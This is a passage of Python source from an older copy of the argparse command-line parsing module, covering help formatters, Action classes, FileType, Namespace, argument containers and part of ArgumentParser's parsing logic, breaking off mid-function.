Help-formatting methods # ======================= def format_help(self): help = self._root_section.format_help() if help: help = self._long_break_matcher.sub('\n\n', help) help = help.strip('\n') + '\n' return help def _join_parts(self, part_strings): return ''.join([ part for part in part_strings if part and part is not SUPPRESS ]) def _format_usage(self, usage, actions, groups, prefix): if prefix is None: prefix = _('usage: ') # if usage is specified, use that if usage is not None: usage = usage % dict(prog=self._prog) # if no optionals or positionals are available, usage is just prog elif usage is None and not actions: usage = '%(prog)s' % dict(prog=self._prog) # if optionals and positionals are available, calculate usage elif usage is None: prog = '%(prog)s' % dict(prog=self._prog) # split optionals from positionals optionals = [] positionals = [] for action in actions: if action.option_strings: optionals.append(action) else: positionals.append(action) # build full usage string format = self._format_actions_usage action_usage = format(optionals + positionals, groups) usage = ' '.join([s for s in [prog, action_usage] if s]) # wrap the usage parts if it's too long text_width = self._width - self._current_indent if len(prefix) + len(usage) > text_width: # break usage into wrappable parts part_regexp = r'\(.*?\)+|\[.*?\]+|\S+' opt_usage = format(optionals, groups) pos_usage = format(positionals, groups) opt_parts = _re.findall(part_regexp, opt_usage) pos_parts = _re.findall(part_regexp, pos_usage) assert ' '.join(opt_parts) == opt_usage assert ' '.join(pos_parts) == pos_usage # helper for wrapping lines def get_lines(parts, indent, prefix=None): lines = [] line = [] if prefix is not None: line_len = len(prefix) - 1 else: line_len = len(indent) - 1 for part in parts: if line_len + 1 + len(part) > text_width: lines.append(indent + ' '.join(line)) line = [] line_len = len(indent) - 1 line.append(part) line_len += len(part) + 1 if line: lines.append(indent + ' '.join(line)) if prefix is not None: lines[0] = lines[0][len(indent):] return lines # if prog is short, follow it with optionals or positionals if len(prefix) + len(prog) <= 0.75 * text_width: indent = ' ' * (len(prefix) + len(prog) + 1) if opt_parts: lines = get_lines([prog] + opt_parts, indent, prefix) lines.extend(get_lines(pos_parts, indent)) elif pos_parts: lines = get_lines([prog] + pos_parts, indent, prefix) else: lines = [prog] # if prog is long, put it on its own line else: indent = ' ' * len(prefix) parts = opt_parts + pos_parts lines = get_lines(parts, indent) if len(lines) > 1: lines = [] lines.extend(get_lines(opt_parts, indent)) lines.extend(get_lines(pos_parts, indent)) lines = [prog] + lines # join lines into usage usage = '\n'.join(lines) # prefix with 'usage:' return '%s%s\n\n' % (prefix, usage) def _format_actions_usage(self, actions, groups): # find group indices and identify actions in groups group_actions = set() inserts = {} for group in groups: try: start = actions.index(group._group_actions[0]) except ValueError: continue else: end = start + len(group._group_actions) if actions[start:end] == group._group_actions: for action in group._group_actions: group_actions.add(action) if not group.required: if start in inserts: inserts[start] += ' [' else: inserts[start] = '[' inserts[end] = ']' else: if start in inserts: inserts[start] += ' (' else: inserts[start] = '(' inserts[end] = ')' for i in range(start + 1, end): inserts[i] = '|' # collect all actions format strings parts = [] for i, action in enumerate(actions): # suppressed arguments are marked with None # remove | separators for suppressed arguments if action.help is SUPPRESS: parts.append(None) if inserts.get(i) == '|': inserts.pop(i) elif inserts.get(i + 1) == '|': inserts.pop(i + 1) # produce all arg strings elif not action.option_strings: part = self._format_args(action, action.dest) # if it's in a group, strip the outer [] if action in group_actions: if part[0] == '[' and part[-1] == ']': part = part[1:-1] # add the action string to the list parts.append(part) # produce the first way to invoke the option in brackets else: option_string = action.option_strings[0] # if the Optional doesn't take a value, format is: # -s or --long if action.nargs == 0: part = '%s' % option_string # if the Optional takes a value, format is: # -s ARGS or --long ARGS else: default = action.dest.upper() args_string = self._format_args(action, default) part = '%s %s' % (option_string, args_string) # make it look optional if it's not required or in a group if not action.required and action not in group_actions: part = '[%s]' % part # add the action string to the list parts.append(part) # insert things at the necessary indices for i in sorted(inserts, reverse=True): parts[i:i] = [inserts[i]] # join all the action items with spaces text = ' '.join([item for item in parts if item is not None]) # clean up separators for mutually exclusive groups open = r'[\[(]' close = r'[\])]' text = _re.sub(r'(%s) ' % open, r'\1', text) text = _re.sub(r' (%s)' % close, r'\1', text) text = _re.sub(r'%s *%s' % (open, close), r'', text) text = _re.sub(r'\(([^|]*)\)', r'\1', text) text = text.strip() # return the text return text def _format_text(self, text): if '%(prog)' in text: text = text % dict(prog=self._prog) text_width = self._width - self._current_indent indent = ' ' * self._current_indent return self._fill_text(text, text_width, indent) + '\n\n' def _format_action(self, action): # determine the required width and the entry label help_position = min( self._action_max_length + 2, self._max_help_position, ) help_width = self._width - help_position action_width = help_position - self._current_indent - 2 action_header = self._format_action_invocation(action) # ho nelp; start on same line and add a final newline if not action.help: tup = self._current_indent, '', action_header action_header = '%*s%s\n' % tup # short action name; start on the same line and pad two spaces elif len(action_header) <= action_width: tup = self._current_indent, '', action_width, action_header action_header = '%*s%-*s ' % tup indent_first = 0 # long action name; start on the next line else: tup = self._current_indent, '', action_header action_header = '%*s%s\n' % tup indent_first = help_position # collect the pieces of the action help parts = [action_header] # if there was help for the action, add lines of help text if action.help: help_text = self._expand_help(action) help_lines = self._split_lines(help_text, help_width) parts.append('%*s%s\n' % (indent_first, '', help_lines[0])) for line in help_lines[1:]: parts.append('%*s%s\n' % (help_position, '', line)) # or add a newline if the description doesn't end with one elif not action_header.endswith('\n'): parts.append('\n') # if there are any sub-actions, add their help as well for subaction in self._iter_indented_subactions(action): parts.append(self._format_action(subaction)) # return a single string return self._join_parts(parts) def _format_action_invocation(self, action): if not action.option_strings: metavar, = self._metavar_formatter(action, action.dest)(1) return metavar else: parts = [] # if the Optional doesn't take a value, format is: # -s, --long if action.nargs == 0: parts.extend(action.option_strings) # if the Optional takes a value, format is: # -s ARGS, --long ARGS else: default = action.dest.upper() args_string = self._format_args(action, default) for option_string in action.option_strings: parts.append('%s %s' % (option_string, args_string)) return ', '.join(parts) def _metavar_formatter(self, action, default_metavar): if action.metavar is not None: result = action.metavar elif action.choices is not None: choice_strs = [str(choice) for choice in action.choices] result = '{%s}' % ','.join(choice_strs) else: result = default_metavar def format(tuple_size): if isinstance(result, tuple): return result else: return (result, ) * tuple_size return format def _format_args(self, action, default_metavar): get_metavar = self._metavar_formatter(action, default_metavar) if action.nargs is None: result = '%s' % get_metavar(1) elif action.nargs == OPTIONAL: result = '[%s]' % get_metavar(1) elif action.nargs == ZERO_OR_MORE: result = '[%s [%s ...]]' % get_metavar(2) elif action.nargs == ONE_OR_MORE: result = '%s [%s ...]' % get_metavar(2) elif action.nargs == REMAINDER: result = '...' elif action.nargs == PARSER: result = '%s ...' % get_metavar(1) else: formats = ['%s' for _ in range(action.nargs)] result = ' '.join(formats) % get_metavar(action.nargs) return result def _expand_help(self, action): params = dict(vars(action), prog=self._prog) for name in list(params): if params[name] is SUPPRESS: del params[name] for name in list(params): if hasattr(params[name], '__name__'): params[name] = params[name].__name__ if params.get('choices') is not None: choices_str = ', '.join([str(c) for c in params['choices']]) params['choices'] = choices_str return self._get_help_string(action) % params def _iter_indented_subactions(self, action): try: get_subactions = action._get_subactions except AttributeError: pass else: self._indent() for subaction in get_subactions(): yield subaction self._dedent() def _split_lines(self, text, width): text = self._whitespace_matcher.sub(' ', text).strip() return _textwrap.wrap(text, width) def _fill_text(self, text, width, indent): text = self._whitespace_matcher.sub(' ', text).strip() return _textwrap.fill( text, width, initial_indent=indent, subsequent_indent=indent, ) def _get_help_string(self, action): return action.help class RawDescriptionHelpFormatter(HelpFormatter): """Help message formatter which retains any formatting in descriptions. Only the name of this class is considered a public API. All the methods provided by the class are considered an implementation detail. """ def _fill_text(self, text, width, indent): return ''.join([indent + line for line in text.splitlines(True)]) class RawTextHelpFormatter(RawDescriptionHelpFormatter): """Help message formatter which retains formatting of all help text. Only the name of this class is considered a public API. All the methods provided by the class are considered an implementation detail. """ def _split_lines(self, text, width): return text.splitlines() class ArgumentDefaultsHelpFormatter(HelpFormatter): """Help message formatter which adds default values to argument help. Only the name of this class is considered a public API. All the methods provided by the class are considered an implementation detail. """ def _get_help_string(self, action): help = action.help if '%(default)' not in action.help: if action.default is not SUPPRESS: defaulting_nargs = [OPTIONAL, ZERO_OR_MORE] if action.option_strings or action.nargs in defaulting_nargs: help += ' (default: %(default)s)' return help # ===================== # Options and Arguments # ===================== def _get_action_name(argument): if argument is None: return None elif argument.option_strings: return '/'.join(argument.option_strings) elif argument.metavar not in (None, SUPPRESS): return argument.metavar elif argument.dest not in (None, SUPPRESS): return argument.dest else: return None class ArgumentError(Exception): """An error from creating or using an argument (optional or positional). The string value of this exception is the message, augmented with information about the argument that caused it. """ def __init__(self, argument, message): self.argument_name = _get_action_name(argument) self.message = message def __str__(self): if self.argument_name is None: format = '%(message)s' else: format = 'argument %(argument_name)s: %(message)s' return format % dict( message=self.message, argument_name=self.argument_name, ) class ArgumentTypeError(Exception): """An error from trying to convert a command line string to a type.""" pass # ============== # Action classes # ============== class Action(_AttributeHolder): """Information about how to convert command line strings to Python objects. Action objects are used by an ArgumentParser to represent the information needed to parse a single argument from one or more strings from the command line. The keyword arguments to the Action constructor are also all attributes of Action instances. Keyword Arguments: - option_strings -- A list of command-line option strings which should be associated with this action. - dest -- The name of the attribute to hold the created object(s) - nargs -- The number of command-line arguments that should be consumed. By default, one argument will be consumed and a single value will be produced. Other values include: - N (an integer) consumes N arguments (and produces a list) - '?' consumes zero or one arguments - '*' consumes zero or more arguments (and produces a list) - '+' consumes one or more arguments (and produces a list) Note that the difference between the default and nargs=1 is that with the default, a single value will be produced, while with nargs=1, a list containing a single value will be produced. - const -- The value to be produced if the option is specified and the option uses an action that takes no values. - default -- The value to be produced if the option is not specified. - type -- The type which the command-line arguments should be converted to, should be one of 'string', 'int', 'float', 'complex' or a callable object that accepts a single string argument. If None, 'string' is assumed. - choices -- A container of values that should be allowed. If not None, after a command-line argument has been converted to the appropriate type, an exception will be raised if it is not a member of this collection. - required -- True if the action must always be specified at the command line. This is only meaningful for optional command-line arguments. - help -- The help string describing the argument. - metavar -- The name to be used for the option's argument with the help string. If None, the 'dest' value will be used as the name. """ def __init__( self, option_strings, dest, nargs=None, const=None, default=None, type=None, choices=None, required=False, help=None, metavar=None, ): self.option_strings = option_strings self.dest = dest self.nargs = nargs self.const = const self.default = default self.type = type self.choices = choices self.required = required self.help = help self.metavar = metavar def _get_kwargs(self): names = [ 'option_strings', 'dest', 'nargs', 'const', 'default', 'type', 'choices', 'help', 'metavar', ] return [(name, getattr(self, name)) for name in names] def __call__(self, parser, namespace, values, option_string=None): raise NotImplementedError(_('.__call__() not defined')) class _StoreAction(Action): def __init__( self, option_strings, dest, nargs=None, const=None, default=None, type=None, choices=None, required=False, help=None, metavar=None, ): if nargs == 0: raise ValueError( 'nargs for store actions must be > 0; if you ' 'have nothing to store, actions such as store ' 'true or store const may be more appropriate', ) if const is not None and nargs != OPTIONAL: raise ValueError('nargs must be %r to supply const' % OPTIONAL) super(_StoreAction, self).__init__( option_strings=option_strings, dest=dest, nargs=nargs, const=const, default=default, type=type, choices=choices, required=required, help=help, metavar=metavar, ) def __call__(self, parser, namespace, values, option_string=None): setattr(namespace, self.dest, values) class _StoreConstAction(Action): def __init__( self, option_strings, dest, const, default=None, required=False, help=None, metavar=None, ): super(_StoreConstAction, self).__init__( option_strings=option_strings, dest=dest, nargs=0, const=const, default=default, required=required, help=help, ) def __call__(self, parser, namespace, values, option_string=None): setattr(namespace, self.dest, self.const) class _StoreTrueAction(_StoreConstAction): def __init__( self, option_strings, dest, default=False, required=False, help=None, ): super(_StoreTrueAction, self).__init__( option_strings=option_strings, dest=dest, const=True, default=default, required=required, help=help, ) class _StoreFalseAction(_StoreConstAction): def __init__( self, option_strings, dest, default=True, required=False, help=None, ): super(_StoreFalseAction, self).__init__( option_strings=option_strings, dest=dest, const=False, default=default, required=required, help=help, ) class _AppendAction(Action): def __init__( self, option_strings, dest, nargs=None, const=None, default=None, type=None, choices=None, required=False, help=None, metavar=None, ): if nargs == 0: raise ValueError( 'nargs for append actions must be > 0; if arg ' 'strings are not supplying the value to append, ' 'the append const action may be more appropriate', ) if const is not None and nargs != OPTIONAL: raise ValueError('nargs must be %r to supply const' % OPTIONAL) super(_AppendAction, self).__init__( option_strings=option_strings, dest=dest, nargs=nargs, const=const, default=default, type=type, choices=choices, required=required, help=help, metavar=metavar, ) def __call__(self, parser, namespace, values, option_string=None): items = _copy.copy(_ensure_value(namespace, self.dest, [])) items.append(values) setattr(namespace, self.dest, items) class _AppendConstAction(Action): def __init__( self, option_strings, dest, const, default=None, required=False, help=None, metavar=None, ): super(_AppendConstAction, self).__init__( option_strings=option_strings, dest=dest, nargs=0, const=const, default=default, required=required, help=help, metavar=metavar, ) def __call__(self, parser, namespace, values, option_string=None): items = _copy.copy(_ensure_value(namespace, self.dest, [])) items.append(self.const) setattr(namespace, self.dest, items) class _CountAction(Action): def __init__( self, option_strings, dest, default=None, required=False, help=None, ): super(_CountAction, self).__init__( option_strings=option_strings, dest=dest, nargs=0, default=default, required=required, help=help, ) def __call__(self, parser, namespace, values, option_string=None): new_count = _ensure_value(namespace, self.dest, 0) + 1 setattr(namespace, self.dest, new_count) class _HelpAction(Action): def __init__( self, option_strings, dest=SUPPRESS, default=SUPPRESS, help=None, ): super(_HelpAction, self).__init__( option_strings=option_strings, dest=dest, default=default, nargs=0, help=help, ) def __call__(self, parser, namespace, values, option_string=None): parser.print_help() parser.exit() class _VersionAction(Action): def __init__( self, option_strings, version=None, dest=SUPPRESS, default=SUPPRESS, help="show program's version number and exit", ): super(_VersionAction, self).__init__( option_strings=option_strings, dest=dest, default=default, nargs=0, help=help, ) self.version = version def __call__(self, parser, namespace, values, option_string=None): version = self.version if version is None: version = parser.version formatter = parser._get_formatter() formatter.add_text(version) parser.exit(message=formatter.format_help()) class _SubParsersAction(Action): class _ChoicesPseudoAction(Action): def __init__(self, name, help): sup = super(_SubParsersAction._ChoicesPseudoAction, self) sup.__init__(option_strings=[], dest=name, help=help) def __init__( self, option_strings, prog, parser_class, dest=SUPPRESS, help=None, metavar=None, ): self._prog_prefix = prog self._parser_class = parser_class self._name_parser_map = {} self._choices_actions = [] super(_SubParsersAction, self).__init__( option_strings=option_strings, dest=dest, nargs=PARSER, choices=self._name_parser_map, help=help, metavar=metavar, ) def add_parser(self, name, **kwargs): # set prog from the existing prefix if kwargs.get('prog') is None: kwargs['prog'] = '%s %s' % (self._prog_prefix, name) # create a pseudo-action to hold the choice help if 'help' in kwargs: help = kwargs.pop('help') choice_action = self._ChoicesPseudoAction(name, help) self._choices_actions.append(choice_action) # create the parser and add it to the map parser = self._parser_class(**kwargs) self._name_parser_map[name] = parser return parser def _get_subactions(self): return self._choices_actions def __call__(self, parser, namespace, values, option_string=None): parser_name = values[0] arg_strings = values[1:] # set the parser name if requested if self.dest is not SUPPRESS: setattr(namespace, self.dest, parser_name) # select the parser try: parser = self._name_parser_map[parser_name] except KeyError: tup = parser_name, ', '.join(self._name_parser_map) msg = _('unknown parser %r (choices: %s)' % tup) raise ArgumentError(self, msg) # parse all the remaining options into the namespace # store any unrecognized options on the object, so that the top # level parser can decide what to do with them namespace, arg_strings = parser.parse_known_args( arg_strings, namespace, ) if arg_strings: vars(namespace).setdefault(_UNRECOGNIZED_ARGS_ATTR, []) getattr(namespace, _UNRECOGNIZED_ARGS_ATTR).extend(arg_strings) # ============== # Type classes # ============== class FileType(object): """Factory for creating file object types Instances of FileType are typically passed as type= arguments to the ArgumentParser add_argument() method. Keyword Arguments: - mode -- A string indicating how the file is to be opened. Accepts the same values as the builtin open() function. - bufsize -- The file's desired buffer size. Accepts the same values as the builtin open() function. """ def __init__(self, mode='r', bufsize=None): self._mode = mode self._bufsize = bufsize def __call__(self, string): # the special argument "-" means sys.std{in,out} if string == '-': if 'r' in self._mode: return _sys.stdin elif 'w' in self._mode: return _sys.stdout else: msg = _('argument "-" with mode %r' % self._mode) raise ValueError(msg) # all other arguments are used as file names if self._bufsize: return open(string, self._mode, self._bufsize) else: return open(string, self._mode) def __repr__(self): args = [self._mode, self._bufsize] args_str = ', '.join([repr(arg) for arg in args if arg is not None]) return '%s(%s)' % (type(self).__name__, args_str) # =========================== # Optional and Positional Parsing # =========================== class Namespace(_AttributeHolder): """Simple object for storing attributes. Implements equality by attribute names and values, and provides a simple string representation. """ def __init__(self, **kwargs): for name in kwargs: setattr(self, name, kwargs[name]) __hash__ = None def __eq__(self, other): return vars(self) == vars(other) def __ne__(self, other): return not (self == other) def __contains__(self, key): return key in self.__dict__ class _ActionsContainer(object): def __init__( self, description, prefix_chars, argument_default, conflict_handler, ): super(_ActionsContainer, self).__init__() self.description = description self.argument_default = argument_default self.prefix_chars = prefix_chars self.conflict_handler = conflict_handler # set up registries self._registries = {} # register actions self.register('action', None, _StoreAction) self.register('action', 'store', _StoreAction) self.register('action', 'store_const', _StoreConstAction) self.register('action', 'store_true', _StoreTrueAction) self.register('action', 'store_false', _StoreFalseAction) self.register('action', 'append', _AppendAction) self.register('action', 'append_const', _AppendConstAction) self.register('action', 'count', _CountAction) self.register('action', 'help', _HelpAction) self.register('action', 'version', _VersionAction) self.register('action', 'parsers', _SubParsersAction) # raise an exception if the conflict handler is invalid self._get_handler() # action storage self._actions = [] self._option_string_actions = {} # groups self._action_groups = [] self._mutually_exclusive_groups = [] # defaults storage self._defaults = {} # determines whether an "option" looks like a negative number self._negative_number_matcher = _re.compile(r'^-\d+$|^-\d*\.\d+$') # whether or not there are any optionals that look like negative # numbers -- uses a list so it can be shared and edited self._has_negative_number_optionals = [] # ==================== # Registration methods # ==================== def register(self, registry_name, value, object): registry = self._registries.setdefault(registry_name, {}) registry[value] = object def _registry_get(self, registry_name, value, default=None): return self._registries[registry_name].get(value, default) # ================================== # Namespace default accessor methods # ================================== def set_defaults(self, **kwargs): self._defaults.update(kwargs) # if these defaults match any existing arguments, replace # the previous default on the object with the new one for action in self._actions: if action.dest in kwargs: action.default = kwargs[action.dest] def get_default(self, dest): for action in self._actions: if action.dest == dest and action.default is not None: return action.default return self._defaults.get(dest, None) # ======================= # Adding argument actions # ======================= def add_argument(self, *args, **kwargs): """ add_argument(dest, ..., name=value, ...) add_argument(option_string, option_string, ..., name=value, ...) """ # if no positional args are supplied or only one is supplied and # it doesn't look like an option string, parse a positional # argument chars = self.prefix_chars if not args or len(args) == 1 and args[0][0] not in chars: if args and 'dest' in kwargs: raise ValueError('dest supplied twice for positional argument') kwargs = self._get_positional_kwargs(*args, **kwargs) # otherwise, we're adding an optional argument else: kwargs = self._get_optional_kwargs(*args, **kwargs) # if no default was supplied, use the parser-level default if 'default' not in kwargs: dest = kwargs['dest'] if dest in self._defaults: kwargs['default'] = self._defaults[dest] elif self.argument_default is not None: kwargs['default'] = self.argument_default # create the action object, and add it to the parser action_class = self._pop_action_class(kwargs) if not _callable(action_class): raise ValueError('unknown action "%s"' % action_class) action = action_class(**kwargs) # raise an error if the action type is not callable type_func = self._registry_get('type', action.type, action.type) if not _callable(type_func): raise ValueError('%r is not callable' % type_func) return self._add_action(action) def add_argument_group(self, *args, **kwargs): group = _ArgumentGroup(self, *args, **kwargs) self._action_groups.append(group) return group def add_mutually_exclusive_group(self, **kwargs): group = _MutuallyExclusiveGroup(self, **kwargs) self._mutually_exclusive_groups.append(group) return group def _add_action(self, action): # resolve any conflicts self._check_conflict(action) # add to actions list self._actions.append(action) action.container = self # index the action by any option strings it has for option_string in action.option_strings: self._option_string_actions[option_string] = action # set the flag if any option strings look like negative numbers for option_string in action.option_strings: if self._negative_number_matcher.match(option_string): if not self._has_negative_number_optionals: self._has_negative_number_optionals.append(True) # return the created action return action def _remove_action(self, action): self._actions.remove(action) def _add_container_actions(self, container): # collect groups by titles title_group_map = {} for group in self._action_groups: if group.title in title_group_map: msg = _('cannot merge actions - two groups are named %r') raise ValueError(msg % (group.title)) title_group_map[group.title] = group # map each action to its group group_map = {} for group in container._action_groups: # if a group with the title exists, use that, otherwise # create a new group matching the container's group if group.title not in title_group_map: title_group_map[group.title] = self.add_argument_group( title=group.title, description=group.description, conflict_handler=group.conflict_handler, ) # map the actions to their new group for action in group._group_actions: group_map[action] = title_group_map[group.title] # add container's mutually exclusive groups # NOTE: if add_mutually_exclusive_group ever gains title= and # description= then this code will need to be expanded as above for group in container._mutually_exclusive_groups: mutex_group = self.add_mutually_exclusive_group( required=group.required, ) # map the actions to their new mutex group for action in group._group_actions: group_map[action] = mutex_group # add all actions to this container or their group for action in container._actions: group_map.get(action, self)._add_action(action) def _get_positional_kwargs(self, dest, **kwargs): # make sure required is not specified if 'required' in kwargs: msg = _("'required' is an invalid argument for positionals") raise TypeError(msg) # mark positional arguments as required if at least one is # always required if kwargs.get('nargs') not in [OPTIONAL, ZERO_OR_MORE]: kwargs['required'] = True if kwargs.get('nargs') == ZERO_OR_MORE and 'default' not in kwargs: kwargs['required'] = True # return the keyword arguments with no option strings return dict(kwargs, dest=dest, option_strings=[]) def _get_optional_kwargs(self, *args, **kwargs): # determine short and long option strings option_strings = [] long_option_strings = [] for option_string in args: # error on strings that don't start with an appropriate prefix if not option_string[0] in self.prefix_chars: msg = _( 'invalid option string %r: ' 'must start with a character %r', ) tup = option_string, self.prefix_chars raise ValueError(msg % tup) # strings starting with two prefix characters are long options option_strings.append(option_string) if option_string[0] in self.prefix_chars: if len(option_string) > 1: if option_string[1] in self.prefix_chars: long_option_strings.append(option_string) # infer destination, '--foo-bar' -> 'foo_bar' and '-x' -> 'x' dest = kwargs.pop('dest', None) if dest is None: if long_option_strings: dest_option_string = long_option_strings[0] else: dest_option_string = option_strings[0] dest = dest_option_string.lstrip(self.prefix_chars) if not dest: msg = _('dest= is required for options like %r') raise ValueError(msg % option_string) dest = dest.replace('-', '_') # return the updated keyword arguments return dict(kwargs, dest=dest, option_strings=option_strings) def _pop_action_class(self, kwargs, default=None): action = kwargs.pop('action', default) return self._registry_get('action', action, action) def _get_handler(self): # determine function from conflict handler string handler_func_name = '_handle_conflict_%s' % self.conflict_handler try: return getattr(self, handler_func_name) except AttributeError: msg = _('invalid conflict_resolution value: %r') raise ValueError(msg % self.conflict_handler) def _check_conflict(self, action): # find all options that conflict with this option confl_optionals = [] for option_string in action.option_strings: if option_string in self._option_string_actions: confl_optional = self._option_string_actions[option_string] confl_optionals.append((option_string, confl_optional)) # resolve any conflicts if confl_optionals: conflict_handler = self._get_handler() conflict_handler(action, confl_optionals) def _handle_conflict_error(self, action, conflicting_actions): message = _('conflicting option string(s): %s') conflict_string = ', '.join([ option_string for option_string, action in conflicting_actions ]) raise ArgumentError(action, message % conflict_string) def _handle_conflict_resolve(self, action, conflicting_actions): # remove all conflicting options for option_string, action in conflicting_actions: # remove the conflicting option action.option_strings.remove(option_string) self._option_string_actions.pop(option_string, None) # if the option now has no option string, remove it from the # container holding it if not action.option_strings: action.container._remove_action(action) class _ArgumentGroup(_ActionsContainer): def __init__(self, container, title=None, description=None, **kwargs): # add any missing keyword arguments by checking the container update = kwargs.setdefault update('conflict_handler', container.conflict_handler) update('prefix_chars', container.prefix_chars) update('argument_default', container.argument_default) super_init = super(_ArgumentGroup, self).__init__ super_init(description=description, **kwargs) # group attributes self.title = title self._group_actions = [] # share most attributes with the container self._registries = container._registries self._actions = container._actions self._option_string_actions = container._option_string_actions self._defaults = container._defaults self._has_negative_number_optionals = \ container._has_negative_number_optionals def _add_action(self, action): action = super(_ArgumentGroup, self)._add_action(action) self._group_actions.append(action) return action def _remove_action(self, action): super(_ArgumentGroup, self)._remove_action(action) self._group_actions.remove(action) class _MutuallyExclusiveGroup(_ArgumentGroup): def __init__(self, container, required=False): super(_MutuallyExclusiveGroup, self).__init__(container) self.required = required self._container = container def _add_action(self, action): if action.required: msg = _('mutually exclusive arguments must be optional') raise ValueError(msg) action = self._container._add_action(action) self._group_actions.append(action) return action def _remove_action(self, action): self._container._remove_action(action) self._group_actions.remove(action) class ArgumentParser(_AttributeHolder, _ActionsContainer): """Object for parsing command line strings into Python objects. Keyword Arguments: - prog -- The name of the program (default: sys.argv[0]) - usage -- A usage message (default: auto-generated from arguments) - description -- A description of what the program does - epilog -- Text following the argument descriptions - parents -- Parsers whose arguments should be copied into this one - formatter_class -- HelpFormatter class for printing help messages - prefix_chars -- Characters that prefix optional arguments - fromfile_prefix_chars -- Characters that prefix files containing additional arguments - argument_default -- The default value for all arguments - conflict_handler -- String indicating how to handle conflicts - add_help -- Add a -h/-help option """ def __init__( self, prog=None, usage=None, description=None, epilog=None, version=None, parents=[], formatter_class=HelpFormatter, prefix_chars='-', fromfile_prefix_chars=None, argument_default=None, conflict_handler='error', add_help=True, ): if version is not None: import warnings warnings.warn( """The "version" argument to ArgumentParser is deprecated. """ """Please use """ """"add_argument(..., action='version', version="N", ...)" """ """instead""", DeprecationWarning, ) superinit = super(ArgumentParser, self).__init__ superinit( description=description, prefix_chars=prefix_chars, argument_default=argument_default, conflict_handler=conflict_handler, ) # default setting for prog if prog is None: prog = _os.path.basename(_sys.argv[0]) self.prog = prog self.usage = usage self.epilog = epilog self.version = version self.formatter_class = formatter_class self.fromfile_prefix_chars = fromfile_prefix_chars self.add_help = add_help add_group = self.add_argument_group self._positionals = add_group(_('positional arguments')) self._optionals = add_group(_('optional arguments')) self._subparsers = None # register types def identity(string): return string self.register('type', None, identity) # add help and version arguments if necessary # (using explicit default to override global argument_default) if '-' in prefix_chars: default_prefix = '-' else: default_prefix = prefix_chars[0] if self.add_help: self.add_argument( default_prefix + 'h', default_prefix * 2 + 'help', action='help', default=SUPPRESS, help=_('show this help message and exit'), ) if self.version: self.add_argument( default_prefix + 'v', default_prefix * 2 + 'version', action='version', default=SUPPRESS, version=self.version, help=_("show program's version number and exit"), ) # add parent arguments and defaults for parent in parents: self._add_container_actions(parent) try: defaults = parent._defaults except AttributeError: pass else: self._defaults.update(defaults) # ======================= # Pretty __repr__ methods # ======================= def _get_kwargs(self): names = [ 'prog', 'usage', 'description', 'version', 'formatter_class', 'conflict_handler', 'add_help', ] return [(name, getattr(self, name)) for name in names] # ================================== # Optional/Positional adding methods # ================================== def add_subparsers(self, **kwargs): if self._subparsers is not None: self.error(_('cannot have multiple subparser arguments')) # add the parser class to the arguments if it's not present kwargs.setdefault('parser_class', type(self)) if 'title' in kwargs or 'description' in kwargs: title = _(kwargs.pop('title', 'subcommands')) description = _(kwargs.pop('description', None)) self._subparsers = self.add_argument_group(title, description) else: self._subparsers = self._positionals # prog defaults to the usage message of this parser, skipping # optional arguments and with no "usage:" prefix if kwargs.get('prog') is None: formatter = self._get_formatter() positionals = self._get_positional_actions() groups = self._mutually_exclusive_groups formatter.add_usage(self.usage, positionals, groups, '') kwargs['prog'] = formatter.format_help().strip() # create the parsers action and add it to the positionals list parsers_class = self._pop_action_class(kwargs, 'parsers') action = parsers_class(option_strings=[], **kwargs) self._subparsers._add_action(action) # return the created parsers action return action def _add_action(self, action): if action.option_strings: self._optionals._add_action(action) else: self._positionals._add_action(action) return action def _get_optional_actions(self): return [ action for action in self._actions if action.option_strings ] def _get_positional_actions(self): return [ action for action in self._actions if not action.option_strings ] # ===================================== # Command line argument parsing methods # ===================================== def parse_args(self, args=None, namespace=None): args, argv = self.parse_known_args(args, namespace) if argv: msg = _('unrecognized arguments: %s') self.error(msg % ' '.join(argv)) return args def parse_known_args(self, args=None, namespace=None): # args default to the system args if args is None: args = _sys.argv[1:] # default Namespace built from parser defaults if namespace is None: namespace = Namespace() # add any action defaults that aren't present for action in self._actions: if action.dest is not SUPPRESS: if not hasattr(namespace, action.dest): if action.default is not SUPPRESS: default = action.default if isinstance(action.default, basestring): default = self._get_value(action, default) setattr(namespace, action.dest, default) # add any parser defaults that aren't present for dest in self._defaults: if not hasattr(namespace, dest): setattr(namespace, dest, self._defaults[dest]) # parse the arguments and exit if there are any errors try: namespace, args = self._parse_known_args(args, namespace) if hasattr(namespace, _UNRECOGNIZED_ARGS_ATTR): args.extend(getattr(namespace, _UNRECOGNIZED_ARGS_ATTR)) delattr(namespace, _UNRECOGNIZED_ARGS_ATTR) return namespace, args except ArgumentError: err = _sys.exc_info()[1] self.error(str(err)) def _parse_known_args(self, arg_strings, namespace): # replace arg strings that are file references if self.fromfile_prefix_chars is not None: arg_strings = self._read_args_from_files(arg_strings) # map all mutually exclusive arguments to the other arguments # they can't occur with action_conflicts = {} for mutex_group in self._mutually_exclusive_groups: group_actions = mutex_group._group_actions for i, mutex_action in enumerate(mutex_group._group_actions): conflicts = action_conflicts.setdefault(mutex_action, []) conflicts.extend(group_actions[:i]) conflicts.extend(group_actions[i + 1:]) # find all option indices, and determine the arg_string_pattern # which has an 'O' if there is an option at an index, # an 'A' if there is an argument, or a '-' if there is a '--' option_string_indices = {} arg_string_pattern_parts = [] arg_strings_iter = iter(arg_strings) for i, arg_string in enumerate(arg_strings_iter): # all args after -- are non-options if arg_string == '--': arg_string_pattern_parts.append('-') for arg_string in arg_strings_iter: arg_string_pattern_parts.append('A') # otherwise, add the arg to the arg strings # and note the index if it was an option else: option_tuple = self._parse_optional(arg_string) if option_tuple is None: pattern = 'A' else: option_string_indices[i] = option_tuple pattern = 'O' arg_string_pattern_parts.append(pattern) # join the pieces together to form the pattern arg_strings_pattern = ''.join(arg_string_pattern_parts) # converts arg strings to the appropriate and then takes the action seen_actions = set() seen_non_default_actions = set() def take_action(action, argument_strings, option_string=None): seen_actions.add(action) argument_values = self._get_values(action, argument_strings) # error if this argument is not allowed with other previously # seen arguments, assuming that actions that use the default # value don't really count as "present" if argument_values is not action.default: seen_non_default_actions.add(action) for conflict_action in action_conflicts.get(action, []): if conflict_action in seen_non_default_actions: msg = _('not allowed with argument %s') action_name = _get_action_name(conflict_action) raise ArgumentError(action, msg % action_name) # take the action if we didn't receive a SUPPRESS value # (e.g. from a default) if argument_values is not SUPPRESS: action(self, namespace, argument_values, option_string) # function to convert arg_strings into an optional action def consume_optional(start_index): # get the optional identified at this index option_tuple = option_string_indices[start_index] action, option_string, explicit_arg = option_tuple # identify additional optionals in the 